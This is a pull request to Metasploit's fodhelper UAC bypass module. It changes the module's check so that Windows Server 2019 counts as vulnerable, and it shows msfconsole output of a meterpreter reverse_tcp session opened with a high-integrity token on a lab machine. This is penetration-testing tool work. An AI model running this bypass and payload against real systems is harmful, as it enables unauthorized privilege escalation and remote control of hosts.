### PR TITLE
Fix UAC check condition in bypassuac_fodhelper module

### DIFF
--- a/modules/exploits/windows/local/bypassuac_fodhelper.rb
+++ b/modules/exploits/windows/local/bypassuac_fodhelper.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     version = get_version_info
-    if version.build_number >= Msf::WindowsVersion::Win10_InitialRelease && !version.windows_server? && is_uac_enabled?
+    if version.build_number >= Msf::WindowsVersion::Win10_InitialRelease && is_uac_enabled?
       Exploit::CheckCode::Appears("Version #{version} appears vulnerable")
     else
       Exploit::CheckCode::Safe("Version #{version} is not vulnerable")


### PR DESCRIPTION
## Fix Fodhelper UAC Bypass check condition

### Description

The `exploit/windows/local/fodhelper_uac_bypass` module incorrectly reported Windows Server 2019 targets as not vulnerable.

The module's `check` method explicitly excluded Windows Server systems with:

```ruby
!version.windows_server?
```

This caused Windows Server distributions which are vulnerable like 2019 targets, to fail the vulnerability check even though the `fodhelper.exe` UAC bypass technique can be used on the target.

This change removes the Windows Server exclusion from the vulnerability check, allowing supported Windows Server versions to be evaluated based on their Windows version and UAC configuration.

### Problem

Before this change:
```ruby
msf exploit(windows/local/bypassuac_fodhelper) > set SESSION 1
SESSION => 1
msf exploit(windows/local/bypassuac_fodhelper) > run
[*] Started reverse TCP handler on 10.100.0.100:4444 
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Exploit completed, but no session was created.
```
Attempting to use a check functionality resulted in:
```ruby
msf exploit(windows/local/bypassuac_fodhelper) > check
[*] The target is not exploitable. Version Windows Server 2019 is not vulnerable
```

This occurred because:
```ruby
version.windows_server?
```
returned `true`, causing the `!version.windows_server?` condition to block further execution.

After removing the Windows Server restriction `version.windows_server?`, the module correctly evaluates Windows Server based on its build version and UAC configuration.

### Verification

Tested with:
```ruby
use exploit/windows/local/fodhelper_uac_bypass
set SESSION 1
check
```

Expected result:
```ruby
[+] The target appears to be vulnerable. Version Windows Server 2019 appears vulnerable
```

Tested payload selection:
```ruby
set payload windows/x64/meterpreter/reverse_tcp
```
Result:
```ruby
msf exploit(windows/local/bypassuac_fodhelper) > check
[+] The target appears to be vulnerable. Version Windows Server 2019 appears vulnerable
msf exploit(windows/local/bypassuac_fodhelper) > run
[*] Started reverse TCP handler on 10.100.0.100:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (248902 bytes) to 10.10.0.5
[*] Cleaning up registry keys ...
[*] Meterpreter session 2 opened (10.100.0.100:4444 -> 10.10.0.5:49876) at 2026-08-20 14:29:01 +0300
```

Testing
 - Tested locally with Metasploit Framework 6.5.0
 - Verified `check` behavior before and after the change
 - Verified that Windows Server is no longer automatically classified as safe
 - Verified that the module proceeds to the UAC and permission checks on Windows Server 2019
 - Tested the module against a Windows Server 2019 and successfully executed on the target.
 - Verified that the module works and spawned a session with High Integrity Token